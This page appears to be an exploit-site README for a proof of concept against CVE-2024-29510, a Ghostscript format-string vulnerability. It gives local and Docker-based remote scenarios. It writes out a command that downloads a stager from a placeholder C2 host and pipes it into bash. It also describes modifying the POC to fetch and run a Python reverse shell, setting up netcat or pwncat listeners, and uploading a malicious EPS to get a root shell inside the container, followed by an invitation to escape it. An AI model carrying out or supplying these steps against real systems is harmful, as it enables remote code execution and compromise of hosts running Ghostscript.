Share
## https://sploitus.com/exploit?id=F106F007-FC08-550E-8673-3EC5C314C305
Original research and POC code: https://codeanlabs.com/blog/research/cve-2024-29510-ghostscript-format-string-exploitation/

NOTE: I have made no changes to the POC apart from the command executed. Full credit goes to Thomas Rinsma @ Codean Labs for their amazing research and POC.

Local Scenario
==============

1. Wrapped in stager script to download and run check script to see if host is vulnerable
2. POC modified to download and execute Python3 reverse shell
2. Stager and reverse shell downloaded and executed through STDIN
4. POC leaves artifact in /tmp with random name

On attacker host:

1. Using pwncat-cs or netcat, create listener for 443
2. Navigate to exploit directory
3. python3 -m http.server 80

On victim host (Ubuntu 23.10 running Ghostscript 10.01.2):

1. Open terminal and run: export RHOST='<C2>'; wget -q http://$RHOST/run -O - | bash &


Remote Scenario (VulnApp)
=========================

1. Build VulnApp using: 'docker build -t cve-2024-29510-demo:latest .' (Requires a copy of https://github.com/ArtifexSoftware/ghostpdl-downloads/releases/download/gs10021/ghostscript-10.02.1.tar.gz in the Dockerfile directory)
2. Run VulnApp using: 'docker run --rm -p 5000:5000 cve-2024-29510-demo:latest'
3. Try converting good.ps to test functionality. Should return a rendered PDF with lines drawing an arrow e.g. '>'
4. Setup a web server on port 80 hosting shell.html e.g. 'python3 -m http.server 80'
5. Using pwncat-cs or netcat, create listener for 443
6. Upload bad.eps, VulnApp will hang and listener should catch a reverse shell for container (Running as root)
7. Escape the container!